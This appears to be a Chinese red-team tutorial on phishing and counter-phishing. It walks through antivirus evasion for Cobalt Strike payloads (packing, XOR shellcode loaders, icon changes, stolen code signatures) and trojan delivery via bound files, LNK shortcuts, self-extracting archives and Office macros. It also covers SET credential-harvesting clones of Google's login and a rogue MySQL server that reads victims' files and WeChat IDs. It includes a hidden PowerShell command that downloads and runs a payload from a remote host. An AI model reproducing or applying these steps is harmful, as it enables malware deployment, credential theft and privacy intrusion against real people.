一、钓鱼邮件

钓鱼邮件一般采用远程控制后门木马(毕竟攻防演练中整个具有破坏性的病毒时违反演练归档的)

1.1、钓鱼文件生成

cobaltstrie生成钓鱼文件

1.1.1、普通exe

image-20240406153248119

1.2、exe免杀

因为杀毒软件病毒库几乎每周都会更新,免杀技术时效性很强

1.2.1、常见查杀方式
  • 静态查杀:对文件进行特征匹配的思路
  • 云查杀:对文件内容及行为的检测
  • 动态查杀:对其产生的行为进行检测
1.2.2、加壳

部分杀毒软件会将加壳后的程序视为恶意文件

利用特殊的算法,度可执行文件里的资源进行压缩,只不过这个压缩,只不过这个压缩文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。windows平台常见的壳如upx(压缩壳)、vmp(虚拟机壳)、穿山甲(加密壳)

themida:通过加密、虚拟化、防调试等技术来保护Windows程序的安全性和可控性。但加壳后的程序在部分系统上可能会运行失败(任何形式的加密混淆都可能导致无法运行)。

不加壳之前,火绒秒杀

直接把生成的exe拉到themia中

image-20240406170340292

点击protect

image-20240406170949310

加壳成功后,火绒没有查杀出来

image-20240406171204942

1.3、shellcode加载器

shellocde是后门木马程序中操作系统实际执行的部分,是最关键的核心

shellcode加载器一般使用C语言、Golang语言编写

  • golang安装包,编写好的shellcode加载器(golang)
1.3.1、安装必要板块

go mod init go.mod
go get -u github.com/lxn/win
go get -u golang.org/x/sys/windows

image-20240406175306706

1.3.2、cobaltsrike生成C payload

image-20240406172542685

image-20240406172613279

image-20240406172638293

xor64.py文件以及xor.go文件:

GobypassAV-shellcode/xor+base64 at main · Pizz33/GobypassAV-shellcode (github.com)

构造 xor64.py (对shellcode进行xor及base64编码), 将上一步生成的 payload.c 中双引号内的字符串,复制到 xor64.py 第三行 originalShellcode = b”” 双引号内 , 然后运行xor64.py

image-20240406175505702

py xor64.py

image-20240406175545929

将 xor64.py 运行后输出的结果,复制到 xor.go 文件第15行 encryptedShellcode := “” 双引号内,然后编译xor.go生成xor.exe, 此命令不会有输出,只会在文件夹中生成xor.exe

go build xor.go

image-20240406175817384

image-20240406175929907

免杀失败!!

正常情况应该不会被360检测出来

image-20240406180700160

1.4、修改文件特征

一般免杀360的文件,都会被上传至360安全大脑进行动态分析与行为检测,产生的效果就是,在联网的情况下,一个免杀的文件过了三四分钟,就被360识别为病毒,其文件hash会被加入360的病毒特征库,再次上传将会被秒杀。

有两种方法可以应对

  • 重新用cobaltstrie生成后门文件,重新编译shellcode加载器
  • 对以及被查杀的文件做手脚,改变器hash及特征
1.4.1、修改图标

使用工具:BeCylconGrabberPortable

image-20240406181059876

选择最大的那个

image-20240406181149685

提取后进行修改

手动修改

使用工具:Restorator2018

将exe拖进软件中,右键添加资源

image-20240406181925331

把ico图标文件拖动到图标文件夹

image-20240406182016851

删除之前创建的TEST,保存即可

image-20240406182042077

使用360进行查杀

发现成功免杀

image-20240406182128642

1.4.2、自动修改图标

通过修改图标批量生成新的后门文件

使用工具:icon-exe.py

python icon-exe.py -i 木马文件 -f ICO图标文件 -n 生成的个数

该工具会对Ico图标文件进行重新渲染处理,所以生成的每个后门文件hash值均不相同,生成的文件会放在output目录中

image-20240406182420341

生成的exe

image-20240406182432655

通过免杀

image-20240406182755365

1.4.3、替换签名

使用工具:sigthief.py

默认生成的后门文件都是没有签名的,一些杀毒软件遇到未知签名的程序会直接报毒。sigthief的作用是窃取签名,比如给自己的后门添加的奇虎的数字签名

python3 sigthief.py -i 你要窃取的文件 -t 木马后门 -o 生成的新文件

image-20240406183316959

image-20240406183334276

二、钓鱼反制

2.1、捆版木马

使用GoFileVBinder.exe,需要Go语言运行环境

GoFileBinder.exe 木马文件 要绑定的正常文件 
start Yihsiwei.bat

image-20240407202950420

image-20240407203015257

可以在更改一下,图标这样的话会更像,这里由于是演示,懒得改了。

运行时,会在当前目录释放并打开test.txt , 并释放5.exe到用户目录运行,配合上签名、图标、免杀,再加上合理选择释放的文件,可以钓到很多安全意识不佳的人员

image-20240407203102487

但是好像没法经过查杀

2.2、Ink木马

ink快捷方式木马经常被应用在钓鱼和恶意软件中,通过快捷方式的目标地址实现运行木马,不过这种方式很容易被杀毒软件查实

操作步骤

  • 使用cobaltstrike生成scripted Web Delivery(S)

image-20240407203513021

image-20240407203538936

image-20240407203552435

把这句话复制下来

  • 使用绝对路径的形式改写powershell.exe
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.128:80/a'))"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.128:80/a'))"
  • 修改ink快捷方式目标

image-20240407204536301

image-20240407204751792

更改后,图标也会变化,可以更改一下图标。

image-20240407204910603

运行后,可以发现目标在cs中上线了

2.3、rar自解压木马

使用工具:winrar

  • 准备 木马文件 与 正常文件 右键添加到 winrar
  • 勾选 创建自解压格式压缩文件(X) , 勾选后压缩文件名会自动修改后缀为 .exe

image-20240407210119403

点击 高级 ,选择 子解压选项,在新的窗口常规菜单中设置解压路径,一般为 C:\Windows\Temp

image-20240407205751779

image-20240407205813427

在设置菜单中设置解压后运行,分别是 木马文件绝对路径 和 正常文件绝对路径

image-20240407210211590

在模式菜单中设置静默模式为全部隐藏

image-20240407210237428

在更新菜单中设置更新模式为解压并更新文件,覆盖模式为覆盖所有文件

image-20240407210337631

image-20240407210357317

可以更改一下图标

image-20240407210615521

运行后就是正常的安装过程

image-20240407210709392

在安装程序运行的那个时间cs就会上线

可以和修改文件名、修改图标、免杀配合起来使用效果更佳。

2.4、office宏钓鱼

新版的office会默认禁用宏

image-20240407211012948

image-20240407211030165

新建一个word

image-20240407211218451

创建宏

image-20240407211316853

image-20240407211345473

image-20240407211409561

image-20240407211435584

存储为启用宏的docm文档

28

29

运行nb.docm 就上线

一般杀毒软件秒杀

2.5、钓鱼网站

使用工具setoolit

  • 运行setoolkit,选择 1 ) 社会工程学攻击

image-20240407212014994

选择 2) 网站攻击

image-20240407212039304

选择3) 获取凭证攻击

image-20240407212056530

这里会出现三个选项 , 1) 网站模版 2)网站克隆 3) 自定义导

image-20240407212207363

使用 1)网站模版, 选择Google

image-20240407212302930

可以看到模拟出了google的登录页面,输入后会自动跳转至google,且输入的账号和密码会被setoolkit获取

image-20240407212704788

这种情况是80端口被占用,

netstat -anltup | grep 80  
kill 9 PID

杀死进程,后重新在使用工具进行选择一次后,页面如下

image-20240407213721642

image-20240407213806723

image-20240407213836654

登录后会跳转到谷歌搜索首页面

也可以自己定义页面和网址

真实的钓鱼网站,需要搭建在公网服务器上,且为了提高钓鱼成功率,会租赁比较相似的域名,用于迷惑受害者

域名购买网站:https://www.godaddy.com/zh-sg

三、mysql蜜罐

https://github.com/Gifts/Rogue-MySql-Server

hfish mysql蜜罐

MySQL服务端可以利用LOAD DATA LOCAL命令来读取MYSQL客户端的任意文件,然后伪造恶意服务器向连接到这个服务器的客户端发送读取文件的payload。

image-20240408092359069

image-20240408092553328

受害者采用任意密码连接mysql

image-20240408093010525

image-20240408093040932

获取攻击者电脑用户名

{
"files":"C:/windows/PFRO.log"
}

image-20240408094432288

image-20240408095819463

获取微信ID

{
"files":"C:/Users/上一步获取的用户名/Documents/WeChat Files/All Users/config/config.data"
}

image-20240408095910938

查看攻击者的微信id,路径是默认的微信存放文件的地址,

如果更改过地址,将会查询不到

image-20240408100847196

根据获得的微信id号,去网上生成微信二维码

这个id号无法直接搜索到

image-20240408101210649